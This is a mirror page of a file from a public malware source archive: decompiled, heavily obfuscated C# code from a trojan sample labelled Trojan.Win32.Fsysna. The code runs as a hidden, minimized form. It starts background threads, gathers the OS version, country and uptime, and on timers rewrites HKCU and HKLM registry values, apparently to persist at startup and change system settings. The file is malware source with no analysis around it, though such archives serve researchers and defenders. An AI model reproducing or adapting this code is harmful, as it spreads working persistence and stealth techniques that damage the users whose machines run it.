mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-22 11:26:11 +00:00
266 lines
9.3 KiB
C#
266 lines
9.3 KiB
C#
|
// Decompiled with JetBrains decompiler
|
|||
|
// Type: .
|
|||
|
// Assembly: MyApplication, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
|
|||
|
// MVID: 4C1CA376-1B35-4961-80E8-8029AD6B5A8B
|
|||
|
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Fsysna.deeq-bccdbf807edf4ae3f172c9e102415d19675fee38175dc7fe4f296402da8186a9.exe
|
|||
|
|
|||
|
using \u0003;
|
|||
|
using \u0005;
|
|||
|
using \u0019;
|
|||
|
using Microsoft.Win32;
|
|||
|
using System;
|
|||
|
using System.ComponentModel;
|
|||
|
using System.Drawing;
|
|||
|
using System.Globalization;
|
|||
|
using System.Runtime.InteropServices;
|
|||
|
using System.Threading;
|
|||
|
using System.Windows.Forms;
|
|||
|
|
|||
|
namespace \u0019
|
|||
|
{
|
|||
|
internal class \u001C : Form
|
|||
|
{
|
|||
|
[NonSerialized]
|
|||
|
internal static \u0002 \u0001;
|
|||
|
private IContainer \u0001;
|
|||
|
private System.Windows.Forms.Timer \u0002;
|
|||
|
private System.Windows.Forms.Timer \u0003;
|
|||
|
private System.Windows.Forms.Timer \u0004;
|
|||
|
|
|||
|
protected override void Dispose([In] bool obj0)
|
|||
|
{
|
|||
|
if (obj0 && this.\u0001 != null)
|
|||
|
\u009E.\u007E\u0011\u0002((object) this.\u0001);
|
|||
|
\u008A.\u001E((object) this, obj0);
|
|||
|
}
|
|||
|
|
|||
|
private void \u0091()
|
|||
|
{
|
|||
|
this.\u0001 = (IContainer) new Container();
|
|||
|
this.\u0002 = new System.Windows.Forms.Timer(this.\u0001);
|
|||
|
this.\u0003 = new System.Windows.Forms.Timer(this.\u0001);
|
|||
|
this.\u0004 = new System.Windows.Forms.Timer(this.\u0001);
|
|||
|
\u009E.\u0016((object) this);
|
|||
|
\u008A.\u007E\u0080((object) this.\u0002, true);
|
|||
|
\u0097\u0002.\u007E\u0081((object) this.\u0002, 10);
|
|||
|
\u0017\u0002.\u007E\u007F((object) this.\u0002, new EventHandler(this.\u008D));
|
|||
|
\u008A.\u007E\u0080((object) this.\u0003, true);
|
|||
|
\u0097\u0002.\u007E\u0081((object) this.\u0003, 5000);
|
|||
|
\u0017\u0002.\u007E\u007F((object) this.\u0003, new EventHandler(this.\u008F));
|
|||
|
\u008A.\u007E\u0080((object) this.\u0004, true);
|
|||
|
\u0097\u0002.\u007E\u0081((object) this.\u0004, 10000);
|
|||
|
\u0017\u0002.\u007E\u007F((object) this.\u0004, new EventHandler(this.\u0090));
|
|||
|
\u008F\u0002.\u0017((object) this, new SizeF(6f, 13f));
|
|||
|
\u0089.\u0018((object) this, AutoScaleMode.Font);
|
|||
|
\u009F\u0002.\u001A((object) this, new Size(292, 70));
|
|||
|
\u0008\u0002.\u0012((object) this, \u001C.\u0001(214));
|
|||
|
\u008A.\u001B((object) this, false);
|
|||
|
\u0008\u0002.\u007E\u0013((object) this, \u001C.\u0001(214));
|
|||
|
\u0099\u0002.\u001C((object) this, FormWindowState.Minimized);
|
|||
|
\u0017\u0002.\u001D((object) this, new EventHandler(this.\u008C));
|
|||
|
\u008A.\u0015((object) this, false);
|
|||
|
}
|
|||
|
|
|||
|
public static void \u0088()
|
|||
|
{
|
|||
|
try
|
|||
|
{
|
|||
|
Thread thread1 = new Thread(new ThreadStart(\u001B.\u0087));
|
|||
|
\u009E.\u007E\u0013\u0003((object) thread1);
|
|||
|
Thread thread2 = new Thread(new ThreadStart(\u001E.\u0095));
|
|||
|
\u009E.\u007E\u0013\u0003((object) thread2);
|
|||
|
}
|
|||
|
catch
|
|||
|
{
|
|||
|
}
|
|||
|
}
|
|||
|
|
|||
|
public \u001C()
|
|||
|
{
|
|||
|
this.\u0091();
|
|||
|
\u001C.\u0088();
|
|||
|
}
|
|||
|
|
|||
|
public static string \u0089([In] CultureInfo obj0)
|
|||
|
{
|
|||
|
try
|
|||
|
{
|
|||
|
RegionInfo regionInfo = new RegionInfo(\u0088.\u007E\u0090\u0003((object) obj0));
|
|||
|
return \u0098\u0002.\u007E\u0092\u0003((object) regionInfo);
|
|||
|
}
|
|||
|
catch
|
|||
|
{
|
|||
|
return string.Empty;
|
|||
|
}
|
|||
|
}
|
|||
|
|
|||
|
public static string \u008A()
|
|||
|
{
|
|||
|
try
|
|||
|
{
|
|||
|
return \u001C.\u0089(new CultureInfo(\u0098\u0002.\u007E\u000F\u0002((object) \u0001\u0002.\u008F\u0003())));
|
|||
|
}
|
|||
|
catch
|
|||
|
{
|
|||
|
return \u001C.\u0001(223);
|
|||
|
}
|
|||
|
}
|
|||
|
|
|||
|
public static string \u008B()
|
|||
|
{
|
|||
|
OperatingSystem operatingSystem = \u008C\u0002.\u0091\u0002();
|
|||
|
string str = \u001C.\u0001(236);
|
|||
|
switch (\u001F\u0002.\u007E\u0097\u0002((object) operatingSystem))
|
|||
|
{
|
|||
|
case PlatformID.Win32Windows:
|
|||
|
switch (\u0088.\u007E\u0010\u0003((object) \u0095\u0002.\u007E\u0098\u0002((object) operatingSystem)))
|
|||
|
{
|
|||
|
case 0:
|
|||
|
str = \u001C.\u0001(249);
|
|||
|
break;
|
|||
|
case 10:
|
|||
|
str = \u001C.\u0001(254);
|
|||
|
break;
|
|||
|
case 90:
|
|||
|
str = \u001C.\u0001(259);
|
|||
|
break;
|
|||
|
}
|
|||
|
break;
|
|||
|
case PlatformID.Win32NT:
|
|||
|
switch (\u0088.\u007E\u000F\u0003((object) \u0095\u0002.\u007E\u0098\u0002((object) operatingSystem)))
|
|||
|
{
|
|||
|
case 3:
|
|||
|
str = \u001C.\u0001(264);
|
|||
|
break;
|
|||
|
case 4:
|
|||
|
str = \u001C.\u0001(264);
|
|||
|
break;
|
|||
|
case 5:
|
|||
|
if (\u0088.\u007E\u0010\u0003((object) \u0095\u0002.\u007E\u0098\u0002((object) operatingSystem)) == 0)
|
|||
|
{
|
|||
|
str = \u001C.\u0001(269);
|
|||
|
break;
|
|||
|
}
|
|||
|
if (\u0088.\u007E\u0010\u0003((object) \u0095\u0002.\u007E\u0098\u0002((object) operatingSystem)) == 1)
|
|||
|
{
|
|||
|
str = \u001C.\u0001(278);
|
|||
|
break;
|
|||
|
}
|
|||
|
if (\u0088.\u007E\u0010\u0003((object) \u0095\u0002.\u007E\u0098\u0002((object) operatingSystem)) == 2)
|
|||
|
{
|
|||
|
str = \u001C.\u0001(283);
|
|||
|
break;
|
|||
|
}
|
|||
|
break;
|
|||
|
case 6:
|
|||
|
if (\u0088.\u007E\u0010\u0003((object) \u0095\u0002.\u007E\u0098\u0002((object) operatingSystem)) == 0)
|
|||
|
{
|
|||
|
str = \u001C.\u0001(292);
|
|||
|
break;
|
|||
|
}
|
|||
|
if (\u0088.\u007E\u0010\u0003((object) \u0095\u0002.\u007E\u0098\u0002((object) operatingSystem)) == 1)
|
|||
|
{
|
|||
|
str = \u001C.\u0001(301);
|
|||
|
break;
|
|||
|
}
|
|||
|
if (\u0088.\u007E\u0010\u0003((object) \u0095\u0002.\u007E\u0098\u0002((object) operatingSystem)) == 2)
|
|||
|
{
|
|||
|
str = \u001C.\u0001(310);
|
|||
|
break;
|
|||
|
}
|
|||
|
break;
|
|||
|
}
|
|||
|
break;
|
|||
|
}
|
|||
|
return str;
|
|||
|
}
|
|||
|
|
|||
|
private void \u008C([In] object obj0, [In] EventArgs obj1)
|
|||
|
{
|
|||
|
}
|
|||
|
|
|||
|
private void \u008D([In] object obj0, [In] EventArgs obj1) => \u009E.\u0014((object) this);
|
|||
|
|
|||
|
public static string \u008E()
|
|||
|
{
|
|||
|
TimeSpan timeSpan = new TimeSpan(0, 0, \u009F.\u008E\u0002() / 1000);
|
|||
|
object[] objArray = new object[8]
|
|||
|
{
|
|||
|
(object) timeSpan.Days,
|
|||
|
(object) \u001C.\u0001(319),
|
|||
|
(object) timeSpan.Hours,
|
|||
|
(object) \u001C.\u0001(332),
|
|||
|
(object) timeSpan.Minutes,
|
|||
|
(object) \u001C.\u0001(345),
|
|||
|
(object) timeSpan.Seconds,
|
|||
|
(object) \u001C.\u0001(362)
|
|||
|
};
|
|||
|
return \u0086\u0002.\u001C\u0002(objArray);
|
|||
|
}
|
|||
|
|
|||
|
private void \u0099()
|
|||
|
{
|
|||
|
try
|
|||
|
{
|
|||
|
RegistryKey registryKey = \u009A.\u007E\u0096\u0003((object) Registry.CurrentUser, \u001C.\u0001(375), true);
|
|||
|
if (\u0095.\u007E\u0097\u0003((object) registryKey, \u001C.\u0001(436)) == null)
|
|||
|
\u0080\u0002.\u007E\u0098\u0003((object) registryKey, \u001C.\u0001(436), (object) \u0006\u0003.\u0008());
|
|||
|
else if (\u0082\u0002.\u0013\u0002((string) \u0095.\u007E\u0097\u0003((object) registryKey, \u001C.\u0001(436)), \u0006\u0003.\u0008()))
|
|||
|
{
|
|||
|
\u0008\u0002.\u007E\u0095\u0003((object) registryKey, \u001C.\u0001(436));
|
|||
|
\u0080\u0002.\u007E\u0098\u0003((object) registryKey, \u001C.\u0001(436), (object) \u0006\u0003.\u0008());
|
|||
|
}
|
|||
|
}
|
|||
|
catch
|
|||
|
{
|
|||
|
}
|
|||
|
try
|
|||
|
{
|
|||
|
RegistryKey registryKey = \u009A.\u007E\u0096\u0003((object) Registry.LocalMachine, \u001C.\u0001(375), true);
|
|||
|
if (\u0095.\u007E\u0097\u0003((object) registryKey, \u001C.\u0001(436)) == null)
|
|||
|
\u0080\u0002.\u007E\u0098\u0003((object) registryKey, \u001C.\u0001(436), (object) \u0006\u0003.\u0008());
|
|||
|
else if (\u0082\u0002.\u0013\u0002((string) \u0095.\u007E\u0097\u0003((object) registryKey, \u001C.\u0001(436)), \u0006\u0003.\u0008()))
|
|||
|
{
|
|||
|
\u0008\u0002.\u007E\u0095\u0003((object) registryKey, \u001C.\u0001(436));
|
|||
|
\u0080\u0002.\u007E\u0098\u0003((object) registryKey, \u001C.\u0001(436), (object) \u0006\u0003.\u0008());
|
|||
|
}
|
|||
|
}
|
|||
|
catch
|
|||
|
{
|
|||
|
}
|
|||
|
try
|
|||
|
{
|
|||
|
RegistryKey registryKey = \u009A.\u007E\u0096\u0003((object) Registry.LocalMachine, \u001C.\u0001(461), true);
|
|||
|
string str = \u0098\u0002.\u007E\u000F\u0002(\u0095.\u007E\u0097\u0003((object) registryKey, \u001C.\u0001(534)));
|
|||
|
if (!\u000E\u0002.\u007E\u0019\u0002((object) str, \u0006\u0003.\u0008()))
|
|||
|
\u0080\u0002.\u007E\u0098\u0003((object) registryKey, \u001C.\u0001(534), (object) \u0096.\u001E\u0002(str, \u0006\u0003.\u0008(), \u001C.\u0001(547)));
|
|||
|
}
|
|||
|
catch
|
|||
|
{
|
|||
|
}
|
|||
|
try
|
|||
|
{
|
|||
|
RegistryKey registryKey = \u009A.\u007E\u0096\u0003((object) Registry.LocalMachine, \u001C.\u0001(552), true);
|
|||
|
string str = \u0098\u0002.\u007E\u000F\u0002(\u0095.\u007E\u0097\u0003((object) registryKey, \u001C.\u0001(629)));
|
|||
|
if (!\u0082\u0002.\u0012\u0002(str, \u001C.\u0001(642)))
|
|||
|
return;
|
|||
|
\u0080\u0002.\u007E\u0098\u0003((object) registryKey, \u001C.\u0001(629), (object) \u001C.\u0001(647));
|
|||
|
}
|
|||
|
catch
|
|||
|
{
|
|||
|
}
|
|||
|
}
|
|||
|
|
|||
|
private void \u008F([In] object obj0, [In] EventArgs obj1) => this.\u0099();
|
|||
|
|
|||
|
private void \u0090([In] object obj0, [In] EventArgs obj1)
|
|||
|
{
|
|||
|
if (\u001B.\u0003 <= 0)
|
|||
|
return;
|
|||
|
\u001B.\u0086(\u001C.\u0001(652));
|
|||
|
}
|
|||
|
|
|||
|
static \u001C() => \u0004.\u007F();
|
|||
|
}
|
|||
|
}
|